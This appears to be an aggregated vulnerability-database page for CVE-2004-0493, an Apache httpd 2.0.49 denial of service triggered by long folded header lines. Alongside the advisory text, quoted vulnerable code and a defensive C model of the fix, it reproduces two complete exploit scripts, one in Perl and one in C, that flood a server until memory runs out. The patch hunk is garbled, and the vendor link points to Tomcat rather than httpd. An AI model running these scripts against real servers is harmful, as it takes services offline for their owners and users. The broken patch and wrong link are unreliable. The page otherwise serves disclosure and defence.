CVE-2004-0493
CVSS 6.4
Published: 2004-08-06 00:00:00
Revised: 2016-10-17 22:45:44
NMCOE

[Original] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.


[CNNVD] Apache ap_escape_html Memory Allocation Remote Denial of Service Vulnerability (CNNVD-200408-043)

Apache is a popular open-source web server.
There is a problem in Apache's ap_escape_html memory allocation; a remote attacker can exploit this vulnerability to mount a denial-of-service attack against the Apache server.
The problem lies in ap_get_mime_headers_core in server/protocol.c:
----
 if (last_field != NULL) {
     if ((len > 0) && ((*field == '\t') || *field == ' ')) {
     ...
         fold_buf = (char *)apr_palloc(r->pool, alloc_len);
----
If a header field begins with a TAB or SPACE, Apache allocates memory for it.
In the ap_escape_html(r->pool, last_field) function, last_field can be arbitrarily long; in the following code:
----
 int i, j;
 for (i = 0, j = 0; s[i] != '\0'; i++)
     if (s[i] == '<' || s[i] == '>')
         j += 3;
     else if (s[i] == '&')
         j += 4;
 if (j == 0)
     return apr_pstrmemdup(p, s, i);
 x = apr_palloc(p, i + j + 1);
----
(i + j + 1) can likewise be arbitrarily large, causing an allocation of arbitrary size that consumes large amounts of resources. On Linux x86_64 it was confirmed that sending 820MB of data overflows (i+j+1), making memcpy crash and causing a denial of service.
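As an added example that is not Apache's code and not from the CNNVD text above, the following C models the two checks a fix for this bug needs: folding a continuation line onto the accumulated field only while the folded length stays within a LimitRequestFieldSize-style limit (the bound the third-party patch later on this page introduces), and computing the ap_escape_html buffer size in size_t with overflow detection instead of the quoted int arithmetic. The driver's inputs are constructed, and 8190 is assumed to be Apache's default LimitRequestFieldSize.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Size ap_escape_html needs (i + j + 1, with j += 3 per '<'/'>' and 4 per '&'),
 * counted in size_t with each step checked; returns 0 instead of a wrapped value. */
size_t html_escaped_size(const char *s, size_t n) {
    size_t extra = 0;
    for (size_t i = 0; i < n; i++) {
        size_t add = (s[i] == '<' || s[i] == '>') ? 3 : (s[i] == '&') ? 4 : 0;
        if (add > SIZE_MAX - extra) return 0;
        extra += add;
    }
    return (extra > SIZE_MAX - n - 1) ? 0 : n + extra + 1;
}

/* The quoted code keeps i and j in int: for n bytes of '&', i + j + 1 = 5n + 1,
 * so any n above INT_MAX / 5 overflows the signed total handed to apr_palloc. */
int int_escape_size_overflows(size_t n) {
    return n > (size_t)INT_MAX / 5;
}

/* Fold one continuation line onto last_field, as the patched check does: the folded
 * length without its trailing NUL may not exceed limit. Returns 0 if folded, -1 if not. */
int fold_header_line(char *last_field, size_t *last_len, size_t cap,
                     const char *line, size_t len, size_t limit) {
    size_t fold_len = *last_len + len + 1;             /* + trailing NUL */
    if (fold_len - 1 > limit || fold_len > cap)
        return -1;                                     /* Apache answers 400 here */
    memcpy(last_field + *last_len, line, len);
    *last_len += len;
    last_field[*last_len] = '\0';
    return 0;
}

/* Driver: feed `count` constructed continuation lines of `len` 'A' bytes and return how
 * many were accepted before the check fired (8190: assumed Apache LimitRequestFieldSize). */
size_t fold_many(size_t count, size_t len, size_t limit) {
    static char field[8190 + 1], line[4096];
    size_t last_len = 0, accepted = 0;
    if (len > sizeof line) return 0;
    memset(line, 'A', len);
    for (size_t k = 0; k < count; k++) {
        if (fold_header_line(field, &last_len, sizeof field, line, len, limit))
            break;
        accepted++;
    }
    return accepted;
}
```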
        

- CVSS (Base Score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:ibm:http_server:2.0.47.1  IBM IBM HTTP Server 2.0.47.1
cpe:/o:trustix:secure_linux:1.5  Trustix Secure Linux 1.5
cpe:/o:gentoo:linux:1.4  Gentoo Linux 1.4
cpe:/o:trustix:secure_linux:2.1  Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0  Trustix Secure Linux 2.0
cpe:/h:avaya:s8300:r2.0.0
cpe:/a:ibm:http_server:2.0.47  IBM IBM HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.47  Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.48  Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:ibm:http_server:2.0.42.1  IBM IBM HTTP Server 2.0.42.1
cpe:/a:apache:http_server:2.0.49  Apache Software Foundation Apache HTTP Server 2.0.49
cpe:/a:ibm:http_server:2.0.42  IBM IBM HTTP Server 2.0.42
cpe:/h:avaya:converged_communications_server:2.0  Avaya Converged Communications Server 2.0
cpe:/h:avaya:s8500:r2.0.0
cpe:/a:ibm:http_server:2.0.42.2  IBM IBM HTTP Server 2.0.42.2
cpe:/h:avaya:s8700:r2.0.0

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:10605  The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and p...
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0493
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-043
(Official data source) CNNVD

- Other Links and Resources

http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html
(UNKNOWN)  FULLDISC  20040628 DoS in apache httpd 2.0.49, yet still apache much better than windows
http://marc.info/?l=bugtraq&m=108853066800184&w=2
(UNKNOWN)  BUGTRAQ  20040629 TSSA-2004-012 - apache
http://marc.info/?l=bugtraq&m=109181600614477&w=2
(UNKNOWN)  HP  SSRT4777
http://security.gentoo.org/glsa/glsa-200407-03.xml
(UNKNOWN)  GENTOO  GLSA-200407-03
http://www.apacheweek.com/features/security-20
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-20
http://www.guninski.com/httpd1.html
(UNKNOWN)  MISC  http://www.guninski.com/httpd1.html
http://www.mandriva.com/security/advisories?name=MDKSA-2004:064
(UNKNOWN)  MANDRAKE  MDKSA-2004:064
http://www.redhat.com/support/errata/RHSA-2004-342.html
(UNKNOWN)  REDHAT  RHSA-2004:342
http://www.securityfocus.com/bid/10619
(VENDOR_ADVISORY)  BID  10619
http://www.trustix.org/errata/2004/0039/
(UNKNOWN)  TRUSTIX  2004-0039
http://xforce.iss.net/xforce/xfdb/16524
(VENDOR_ADVISORY)  XF  apache-apgetmimeheaderscore-dos(16524)

- Vulnerability Information

Apache ap_escape_html Memory Allocation Remote Denial of Service Vulnerability
Medium risk  Other
2004-08-06 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and Patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Georgi Guninski provides the following third-party patch:
        ----------------------------------
        Index: server/protocol.c
        ===============================================
        RCS file: /home/cvspublic/httpd-2.0/server/protocol.c,v
        retrieving revision 1.148
        diff -u -r1.148 protocol.c
        --- server/protocol.c 22 Apr 2004 22:38:03 -0000 1.148
        +++ server/protocol.c 13 Jun 2004 19:47:36 -0000
        @@ -716,6 +716,23 @@
         * continuations that span many many lines.
         */
         apr_size_t fold_len = last_len + len + 1; /* trailing null */
        +
        + if ((fold_len - 1) > r->server->limit_req_fieldsize) {
        + r->status = HTTP_BAD_REQUEST;
        + /* report what we have accumulated so far before the
        + * overflow (last_field) as the field with the problem
        + */
        + apr_table_setn(r->notes, "error-notes",
        + apr_pstrcat(r->pool,
        + "Size of a request header field "
        + "after folding "
        + "exceeds server limit.
        \n"
        + "
\n",

        + ap_escape_html(r->pool, last_field),
        + "
\n", NULL));
        + return;
        + }
        +
         if (fold_len > alloc_len) {
         char *fold_buf;
         alloc_len += alloc_len;
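Review bot: as quoted, the error-notes string literal after "exceeds server limit." is broken across several lines with unbalanced quotes (the stray `\n"` and `"` fragments before and after the ap_escape_html(r->pool, last_field) argument), so this hunk will not compile until that literal is rejoined on one line; the markup that originally wrapped the escaped field appears to have been lost in extraction and should be restored from the source advisory rather than guessed. The bounding logic itself is right: fold_len = last_len + len + 1 includes the trailing null, so comparing fold_len - 1 against r->server->limit_req_fieldsize rejects the folded field as soon as it exceeds LimitRequestFieldSize, and because every continuation line passes this test before the apr_palloc growth below it, last_field stays within that limit when it is handed to ap_escape_html in the error path, which is what closes the unbounded allocation described above. The early return leaves r->status = HTTP_BAD_REQUEST as the only signal to the caller; a one-line comment saying so would help the next reader.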
        ----------------------------------
Vendor patch:
Apache Software Foundation
--------------------------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://jakarta.apache.org/tomcat/index.html

- Vulnerability Information (360)

Apache HTTPd Arbitrary Long HTTP Headers DoS (EDBID:360)
multiple dos
2004-07-22 Verified
80 bkbll
N/A
#!/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net http://www.cnhonker.com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
#

use strict;
use warnings;
use IO::Socket::INET;

my $host = "10.10.10.114";
my $port = 80;
# IO::Socket::INET reports construction failures in $@; send() failures are in $!
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')
    or die "new error: $@\n";
binmode($sock);
my $hostname = "Host: $host";
my $buf2 = 'A' x 50;
my $buf4 = 'A' x 8183;
my $len  = length($buf2);
my $buf  = "GET / HTTP/1.1\r\n";
send($sock, $buf, 0) or die "send error: $!\n";
# each line starts with a space, so the server folds it onto the previous header field
for (my $i = 0; $i < 2000000; $i++) {
    $buf = " $buf4\r\n";
    send($sock, $buf, 0) or die "send error: $!, target maybe have been D.o.S?\n";
}
$buf  = "$hostname\r\n";
$buf .= "Content-Length: $len\r\n";

$buf .= "\r\n";
$buf .= $buf2 . "\r\n\r\n";

send($sock, $buf, 0) or die "send error: $!\n";
print "Ok, our buffer have send to target \n";
close($sock);

- Vulnerability Information (371)

Apache HTTPd Arbitrary Long HTTP Headers DoS (c version) (EDBID:371)
linux dos
2004-08-02 Verified
0 n/a
N/A
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>   /* inet_addr, inet_ntoa */
#include <errno.h>
#include <string.h>
#include <unistd.h>

#define A 0x41
#define PORT 80

struct sockaddr_in hrm;

int conn(char *ip)
{
    int sockfd;
    hrm.sin_family = AF_INET;
    hrm.sin_port = htons(PORT);
    hrm.sin_addr.s_addr = inet_addr(ip);
    memset(&(hrm.sin_zero), 0, 8);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0 || connect(sockfd, (struct sockaddr *)&hrm, sizeof(struct sockaddr)) < 0)
    {
        perror("connect");
        exit(0);
    }
    return sockfd;
}

int main(int argc, char *argv[])
{
    int i, x;
    char buf[300], a1[8132], a2[51], host[100], content[100];
    const char *crlf = "\r\n";
    char *ip;
    if (argc < 2)
    {
        printf("%s: IP\n", argv[0]);
        exit(0);
    }
    ip = argv[1];
    memset(a1, '\0', 8132);
    memset(host, '\0', 100);
    memset(content, '\0', 100);
    /* one continuation line: a leading space followed by 0x41 bytes,
     * leaving the last byte as the NUL terminator strlen() needs */
    a1[0] = ' ';
    for (i = 1; i < 8131; i++)
        a1[i] = A;
    x = conn(ip);
    printf("[x] Connected to: %s.\n", inet_ntoa(hrm.sin_addr));
    snprintf(host, sizeof(host), "Host: %s\r\n", argv[1]);
    snprintf(content, sizeof(content), "Content-Length: 50\r\n");
    snprintf(buf, sizeof(buf), "GET / HTTP/1.0\r\n");
    write(x, buf, strlen(buf));
    printf("[x] Sending buffer...");
    for (i = 0; i < 2000; i++)
    {
        write(x, a1, strlen(a1));
        write(x, crlf, strlen(crlf));
    }
    memset(buf, '\0', 300);
    strcpy(buf, host);
    strcat(buf, content);
    for (i = 0; i < 50; i++)
        a2[i] = A;
    a2[50] = '\0';               /* terminate before strcat reads it */
    strcat(buf, a2);
    strcat(buf, "\r\n\r\n");
    write(x, buf, strlen(buf));
    printf("done!\n");
    close(x);
    return 0;
}

// milw0rm.com [2004-08-02]

- Vulnerability Information

7269
Multiple HTTP Server Input Header Folding DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability Description

Apache contains a flaw that may allow a remote denial of service. The issue is triggered when overly long header lines starting with either a TAB or SPACE character are processed by the "ap_get_mime_headers_core()" function, and will result in loss of availability for the service.

- Timeline

2004-06-28 Unknown
2004-07-21 Unknown

- Solution

Upgrade to version 2.0.50 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author
